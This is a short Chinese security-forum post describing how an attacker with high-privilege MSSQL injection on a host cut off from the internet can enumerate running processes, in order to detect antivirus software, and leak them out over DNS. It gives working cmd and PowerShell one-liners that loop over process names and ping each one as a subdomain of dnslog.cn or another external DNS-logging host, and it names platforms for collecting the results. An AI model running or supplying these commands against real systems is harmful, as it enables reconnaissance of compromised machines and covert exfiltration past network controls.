安全矩阵

 找回密码
 立即注册
搜索
查看: 2576|回复: 0

如何利用dnslog探测目标主机杀软

[复制链接]

855

主题

862

帖子

2940

积分

金牌会员

Rank: 6Rank: 6

积分
2940
发表于 2021-9-16 21:07:10 | 显示全部楼层 |阅读模式
原文链接:如何利用dnslog探测目标主机杀软

0x01 前言
2021年7月某天,团队@Twe1ve老哥遇到这样一个场景:MSSQL高权限注入,目标主机不出网,想利用dnslog探测这台主机中是否存在杀软?
当时想都没想,就回了句难搞!其实还是能实现的,最后和他一起测试出了两种方法。
0x02 利用cmdshell for循环实现
两种方法原理一样,都是先获取目标主机的进程,然后通过for、ForEach循环Ping dnslog外带出来。
for /F %i in ('wmic process get Name ^| findstr ".exe"') do ping -n 1 %i.******.dnslog.cn >nul

0x03 利用powershell foreach循环实现
以下命令是@Twe1ve老哥整出来的,加了个去重,但是在实际测试过程中发现好像并没有起到去重效果。最后别忘了删除一下1.txt文件!
  1. powershell -c "Get-Process | select processname > 1.txt"
  2. powershell -c "Get-Content .\1.txt | Sort-Object -Unique | ForEach-Object {if($_ -match $regex){$b=$_.trim();ping -n 1 $b'.***fks2j.ns.dns3.cf.'} }"
复制代码



注:dnslog.cn及其他大多数dnslog平台的前端仅能展示最近十条记录,想要获取完整记录可以使用ceye.io或dns.xn--9tr.com,用xn--9tr在获取记录时请打开F12看请求。



回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2025-4-22 16:46 , Processed in 0.013835 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表